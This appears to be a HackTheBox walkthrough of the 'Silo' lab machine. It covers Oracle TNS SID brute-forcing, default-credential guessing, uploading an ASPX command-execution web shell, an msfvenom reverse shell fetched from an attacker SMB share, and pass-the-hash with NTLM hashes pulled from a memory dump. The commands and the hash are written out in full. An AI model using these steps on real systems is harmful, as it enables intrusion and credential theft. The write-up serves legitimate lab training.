HackTheBox | Silo

Nmap Results

# Nmap 7.92 scan initiated Sun Aug 21 15:00:32 2022 as: nmap -T5 -p80,135,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 -A -oA scan-all -Pn
Nmap scan report for
Host is up (0.014s latency).

80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-08-21T19:02:35
|_  start_date: 2022-08-21T18:59:31

TRACEROUTE (using port 445/tcp)
1   12.52 ms
2   12.99 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 21 15:02:41 2022 -- 1 IP address (1 host up) scanned in 129.39 seconds

Service Enumeration


Test SMB for anonymous share enumeration.

smbclient -L //$target -U '' --option="client min protocol=core"

NT_STATUS_LOGON_FAILURE – going to need a credential to connect to SMB.


Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r

/aspnet_client        (Status: 403) [Size: 1233]


nmap already ran the oracle-tns-version script on the port and fingerprinted it as Oracle TNS Listener . I'm not very familiar with this service, but there is a brief overview of testing it here.

1521,1522-1529 - Pentesting Oracle TNS Listener - HackTricks

Looking over the cheat sheet, the methodology for testing Oracle TNS Listener is:

  1. Get the version number
  2. Enumerate SIDs
  3. Test credentials
  4. Exploit
    • Remote Code Execution (RCE)
    • Get/Put files (possible RCE by putting a payload in the web root)
    • Possible privilege escalation on certain versions

Enumerate SIDs

Download the sids-oracle.txt file provided in the HackTricks cheat sheet. Then, let's use the suggested hydra command – with some modifications added by me – to brute force the SIDs.

hydra -V -L ./sids-oracle.txt -o found-sids.txt -s 1521 oracle-sid
cat ./found-sids.txt

[1521][oracle-sid] host:
[1521][oracle-sid] host:   login: CLRExtProc
[1521][oracle-sid] host:   login: PLSExtProc
[1521][oracle-sid] host:   login: XE

Test Credentials

I tested the offline cracking methodology described here in the cheat sheet. I found that the XE SID is the only SID that would return user hashes. Unfortunately, I don't have a super strong GPU to brute-force hashes and the word list I used was not returning anything valid.

I am going to use the odat tool mentioned in the cheat sheet. A couple dependencies were not installed, so just noting here what I installed:

python3 -m pip install python-libnmap
python3 -m pip install pycryptodome

Now, we can get to work.

./odat.py --help
./odat.py passwordguesser --help
./odat.py passwordguesser -s -p 1521 -d XE --both-ul

Time to Exploit

We've completed all three prerequisites to exploit the target as discussed above:

  1. Get the version number
  2. Enumerate SIDs
    • Valid SID: XE
  3. Test credentials
    • Valid Credentials: scott/tiger

First, let's install the sqlplus client so we can connect to the database and double-check the credential

sudo apt update
sudo apt install -y oracle-instantclient-sqlplus

# Set an environment variable so the sqlplus client
# Can load the shared libraries
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib

# Add the environment variable to .zshrc so that
# It's set every time a shell opens
echo 'export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib' >> ~/.zshrc

Now, let's try connecting to the database.

sqlplus scott/tiger@ 'as sysdba';


Test Web Root Upload

Let's see if we can abuse the IIS web server to upload a shell and gain a foothold. First, let's see if we can upload a test.html file to the web root.

echo '<h1>Hello, world! From 0xBEN</h1>' > test.html

Now, we'll connect to the database as the administrator using the --sysdba flag and write the test.html file to the web root, C:\inetpub\wwwroot .

./odat.py utlfile --help
./odat.py utlfile -s -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' test.html test.html --sysdba

Upload Web Pseudo-shell

I am going to use this code as a template for my pseudo-shell. All credit goes to the author.

Simple ASPX application (vulnerable to OS command injections)
Simple ASPX application (vulnerable to OS command injections) - ping.aspx

Download the code:

wget https://gist.githubusercontent.com/stasinopoulos/95ce3d164fec1d477f80ea3675be2021/raw/b2fdbda6798f015a452df37f792bbc2b99c97b06/ping.aspx -O cmd.aspx

Now, I'm going to change this line of code:


psi.Arguments = "/c ping -n 2 " + arg;


psi.Arguments = "/c " + arg;

Now, let's upload the file to the web root.

./odat.py utlfile -s -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' cmd.aspx cmd.aspx --sysdba

Transfer a Reverse Shell

I used my pseudo-shell to run systeminfo and find out more about the target operating system. Using our pseudo-shell, let's create a reverse shell payload with msfvenom and transfer it to the target.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST= LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exe

Now, we'll start a SMB server to host the file and execute it on the target.

smbserver.py -smb2support evil $PWD

Start a SMB server

sudo rlwrap nc -lnvp 443

Start a TCP listener

Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 SILO
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00115-23036-AA976
Original Install Date:     12/31/2017, 11:01:23 PM
System Boot Time:          8/28/2022, 1:33:39 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,086 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,491 MB
Virtual Memory: In Use:    1,308 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 149 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894852
                           [05]: KB2903939
                           [06]: KB2911106
                           [07]: KB2919355
                           [08]: KB2919394
                           [09]: KB2928680
                           [10]: KB2934520
                           [11]: KB2938066
                           [12]: KB2954879
                           [13]: KB2966826
                           [14]: KB2966828
                           [15]: KB2967917
                           [16]: KB2968296
                           [17]: KB2972103
                           [18]: KB2973114
                           [19]: KB2973351
                           [20]: KB2989930
                           [21]: KB3000850
                           [22]: KB3003057
                           [23]: KB3004361
                           [24]: KB3004365
                           [25]: KB3012702
                           [26]: KB3013172
                           [27]: KB3013791
                           [28]: KB3014442
                           [29]: KB3019978
                           [30]: KB3021910
                           [31]: KB3022777
                           [32]: KB3023219
                           [33]: KB3023266
                           [34]: KB3024751
                           [35]: KB3024755
                           [36]: KB3029603
                           [37]: KB3030377
                           [38]: KB3030947
                           [39]: KB3033446
                           [40]: KB3035126
                           [41]: KB3036612
                           [42]: KB3037576
                           [43]: KB3037924
                           [44]: KB3038002
                           [45]: KB3042085
                           [46]: KB3043812
                           [47]: KB3044374
                           [48]: KB3044673
                           [49]: KB3045634
                           [50]: KB3045685
                           [51]: KB3045717
                           [52]: KB3045719
                           [53]: KB3045755
                           [54]: KB3045992
                           [55]: KB3045999
                           [56]: KB3046017
                           [57]: KB3046737
                           [58]: KB3048043
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB3054464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3055642
                           [66]: KB3059317
                           [67]: KB3060681
                           [68]: KB3060793
                           [69]: KB3061512
                           [70]: KB3063843
                           [71]: KB3071756
                           [72]: KB3072307
                           [73]: KB3074228
                           [74]: KB3074545
                           [75]: KB3075220
                           [76]: KB3077715
                           [77]: KB3078405
                           [78]: KB3078676
                           [79]: KB3080042
                           [80]: KB3080149
                           [81]: KB3082089
                           [82]: KB3084135
                           [83]: KB3086255
                           [84]: KB3087041
                           [85]: KB3087137
                           [86]: KB3091297
                           [87]: KB3092601
                           [88]: KB3092627
                           [89]: KB3094486
                           [90]: KB3095701
                           [91]: KB3097992
                           [92]: KB3099834
                           [93]: KB3100473
                           [94]: KB3103616
                           [95]: KB3103696
                           [96]: KB3103709
                           [97]: KB3109103
                           [98]: KB3109976
                           [99]: KB3110329
                           [100]: KB3115224
                           [101]: KB3121261
                           [102]: KB3121461
                           [103]: KB3122651
                           [104]: KB3123245
                           [105]: KB3126033
                           [106]: KB3126434
                           [107]: KB3126587
                           [108]: KB3127222
                           [109]: KB3128650
                           [110]: KB3133043
                           [111]: KB3133690
                           [112]: KB3134179
                           [113]: KB3134815
                           [114]: KB3137728
                           [115]: KB3138602
                           [116]: KB3139164
                           [117]: KB3139398
                           [118]: KB3139914
                           [119]: KB3140219
                           [120]: KB3140234
                           [121]: KB3145384
                           [122]: KB3145432
                           [123]: KB3146604
                           [124]: KB3146723
                           [125]: KB3146751
                           [126]: KB3147071
                           [127]: KB3153704
                           [128]: KB3155784
                           [129]: KB3156059
                           [130]: KB3159398
                           [131]: KB3161949
                           [132]: KB3161958
                           [133]: KB3162343
                           [134]: KB3169704
                           [135]: KB3172614
                           [136]: KB3172729
                           [137]: KB3173424
                           [138]: KB3175024
                           [139]: KB3178539
                           [140]: KB3179574
                           [141]: KB3186539
                           [142]: KB4033369
                           [143]: KB4033428
                           [144]: KB4040972
                           [145]: KB4040974
                           [146]: KB4040981
                           [147]: KB4041777
                           [148]: KB4054854
                           [149]: KB4054519
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Current User

User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Users and Groups

Local Users

User accounts for \\

Administrator            Guest                    Phineas

Local Groups

SILO\Access Control Assistance Operators
SILO\Backup Operators
SILO\Certificate Service DCOM Access
SILO\Cryptographic Operators
SILO\Distributed COM Users
SILO\Event Log Readers
SILO\Hyper-V Administrators
SILO\Network Configuration Operators
SILO\Performance Log Users
SILO\Performance Monitor Users
SILO\Power Users
SILO\Print Operators
SILO\RDS Endpoint Servers
SILO\RDS Management Servers
SILO\RDS Remote Access Servers
SILO\Remote Desktop Users
SILO\Remote Management Users

Network Configurations


Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . :
   Subnet Mask . . . . . . . . . . . :
   Default Gateway . . . . . . . . . :

Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Open Ports

TCP                 LISTENING       4
  TCP                LISTENING       620
  TCP                LISTENING       4
  TCP               LISTENING       1212
  TCP               LISTENING       4
  TCP              LISTENING       4
  TCP              LISTENING       428
  TCP              LISTENING       760
  TCP              LISTENING       828
  TCP              LISTENING       904
  TCP              LISTENING       1076
  TCP              LISTENING       528
  TCP              LISTENING       520
  TCP              LISTENING       1804
  TCP              LISTENING       4
  TCP              LISTENING       1212
  TCP              LISTENING       1212
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       620
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1521              [::]:0                 LISTENING       1212
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       428
  TCP    [::]:49153             [::]:0                 LISTENING       760
  TCP    [::]:49154             [::]:0                 LISTENING       828
  TCP    [::]:49155             [::]:0                 LISTENING       904
  TCP    [::]:49159             [::]:0                 LISTENING       1076
  TCP    [::]:49160             [::]:0                 LISTENING       528
  TCP    [::]:49161             [::]:0                 LISTENING       520
  TCP    [::]:49162             [::]:0                 LISTENING       1804

Interesting Files

C:\Users\Phineas\Desktop\Oracle issue.txt

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 

link password:

 NOTE:  The password for the Dropbox file would not work for me, so I had to glance at a walkthrough for answers. Turns out there was an encoding issue causing the £ character to display as ?. The actual password is £%Hm8646uC$

Open the Dropbox link in your browser and enter the supplied password.

Privilege Escalation

We're provided with a SILO-20180105-221806.zip file from Dropbox. If you unzip it, you'll find a memory dump file .DMP that we need to analyze.

Reading the Crash Dump

Download Volatility

Use Linux Standalone executable unzip the archive.

Release Downloads | Volatility Foundation
wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
unzip volatility_2.6_lin64_standalone.zip
cp volatility_2.6_lin64_standalone/volatility_2.6_lin64_standalone ./volatility

Analyze the Dump File

Using the systeminfo command output from before, we know we're dealing with a Microsoft Windows Server 2012 R2 Standard x64 operating system. This is critical to know, as it will enable Volatility to read the memory artifacts correctly.

# Show help message
./volatility --help

# List profiles (and other info)
./volatility --info
./volatility --info | grep 2012

# This command will take a bit to run
# Dump NTLM hashes from memory
./volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6

Pass the Hash

We'll practice this with a few options:

# pth-winexe
pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' // cmd.exe

# smbexec.py
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@'

# psexec.py
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@' cmd.exe

# CrackMapExec
# Create a payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST= LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o 0xBEN_shell.exe
# Host it with SMB server
smbserver.py -smb2support evil $PWD
# Start a listener
sudo rlwrap nc -lnvp 443
# Connect to SMB as the Administrator and run the payload from the SMB server on Kali
crackmapexec smb -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' --local-auth -x '\\\evil\0xBEN_shell.exe'





